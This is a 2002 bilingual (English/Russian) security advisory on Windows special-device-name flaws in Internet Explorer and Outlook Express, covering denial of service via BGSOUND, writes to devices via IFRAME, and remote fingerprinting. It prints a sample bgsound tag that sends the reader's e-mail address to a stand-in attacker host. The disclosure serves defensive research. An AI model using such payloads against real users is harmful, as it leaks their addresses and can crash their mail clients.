Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:2933
HistoryMay 15, 2002 - 12:00 a.m.

dH team & SECURITY.NNOV: special device access, information leakage and DoS in Outlook Express

2002-05-1500:00:00
vulners.com
25

Русская версия этой advisory приведена ниже.

Original version of this advisory:
http://www.security.nnov.ru/advisories/msiedos.asp

Title: Special device access and DoS in Microsoft Internet
Exporer/Outlook Express/Outlook
Authors: ERRor, 3APA3A
Date: May, 14 2002
Affected: Internet Explorer 6.0
Vendor: Microsoft
Risk: Average to high
Remote: Yes
Exploitable: Yes
Vendor notified: April, 24 2002

Intro:

All versions of Windows have a reserved filenames referred to special
devices such as prn, aux, nul, etc also called DOS devices. Filename for
special device may have any directory path and any extension after dot.
For example c:\temp\prn.tmp refers to prn device. Same API is used to
access special device and regular files. Unauthorized access to special
device may be significant security issue causing different results: from
Denial of Service against running program or service to hardware failure
or secure data compromise.

Problem:

ERRor discovered that <BGSOUND> tag in conjunction with special device
name causes DoS against Internet Explorer or Outlook Express regardless
of security zone settings. For Outlook Express it's untrivial to remove
malcrafted message without losing message folder.

During investigation of this issue it was found by 3APA3A and ERRor that
using <IFRAME> tag it's possible to send any data to special device.

Another problem is that regardless of security zone settings source
specified in <BGSOUND> tag is always downloaded. It makes it possible to
fingerprint remote client by his e-mail using something like

<bgsound src="http://evil.com/[email protected]&quot;&gt;

Remote client fingerprint problem is discussed in [4].

Exploitation:

You can use [2] to test DoS against Outlook Express via <BGSOUN>. [3]
will print text line on a text printer attached to lpt1 in Outlook
Express 6.0 via <IFRAME>

Vendor:

Microsoft was informed on April, 24 2002. No feedback from vendor since
April, 25.

References:

  1. Special device access and DoS in Outlook Express
    http://www.security.nnov.ru/search/news.asp?binid=2010
  2. Outlook Express Special Device DoS POC
    http://www.security.nnov.ru/files/iedos/dos.eml
  3. Outlook Express Special Device access POC
    http://www.security.nnov.ru/files/iedos/print.eml
  4. Security risks associated with using e-mail.
    http://www.security.nnov.ru/articles/uninet/

Оригинальная версия этой статьи:
http://www.security.nnov.ru/advisories/msiedos.asp

Тема: Доступ к специальным устройствам в Internet Explorer
Авторы: ERRor, 3APA3A
Дата: 14 мая 2002
Затронуты: Microsoft Internet Explorer 6.0
Microsoft Outlook Express 6.0
Производитель: Microsoft
Опасность: От средней до высокой
Удаленая: Да
Воспроизводима: Да
Производитель уведомлен: 24 Апреля 2002

Введение:

Во всех версиях Windows есть зарезервированные имена файлов, которые
относятся к специальным устройствам (называемые так же DOS-устройства),
такие как prn, aux, nul и т.д. Имя устройства не зависит от пути к
каталогу, расширения файла и т.д. (т.е. c:\temp\prn.tmp является
специальным устройством prn). Для работы со специальными устройствами
применяется тот же API что и для работы с обычными файлами.
Несанкционированный доступ к специальным устройствам может привести к
различным неприятным последствиям начиная с некорректной работы службы
или программы, производящей попытку доступа к файлу и заканчивая
повреждением физического устройства или компрометацией важных данных.

Описание проблемы:

ERRor обнаружил, что с помощью тэга <BGSOUND> в сочетании со специальным
именем устройства можно вызвать зависание Outlook Express. При этом
возвращение программы в рабочее состояние без потери архива писем
является нетривиальной задачей.

Во время исследования этой проблемы было выявлено, что с помощью тэга
<IFRAME> можно послать любые данные в специальное устройство.

Так же, проблемой является то, что исходный файл тэга <BGSOUND>
загружается всегда и с любого сайта независимо от установок зоны
безопасности. Это делает возможным "регистрацию" клиента с помощью
<bgsound src="http://evil.com/[email protected]&quot;&gt;
Проблема получения сведений о клиенте обсуждается в [4].

Использование:

В [2] дается пример DoS-атаки против Outlook Express через <BGSOUND>. В
[3] выводится текстовая строка на принтер подключенный к порту lpt1
через <IFRAME>.

Производитель:

Microsoft был проинформирован 24 апреля 2002 года. Не было получено
сообщений по данной проблеме с 25 апреля.

Ссылки:

  1. Доступ к специальным устройствам в Microsoft Internet Explorer
    http://www.security.nnov.ru/search/news.asp?binid=2010
  2. Outlook Express Special Device DoS POC
    http://www.security.nnov.ru/files/iedos/dos.eml
  3. Outlook Express Special Device access POC
    http://www.security.nnov.ru/files/iedos/print.eml
  4. Security risks associated with using e-mail.
    http://www.security.nnov.ru/articles/uninet/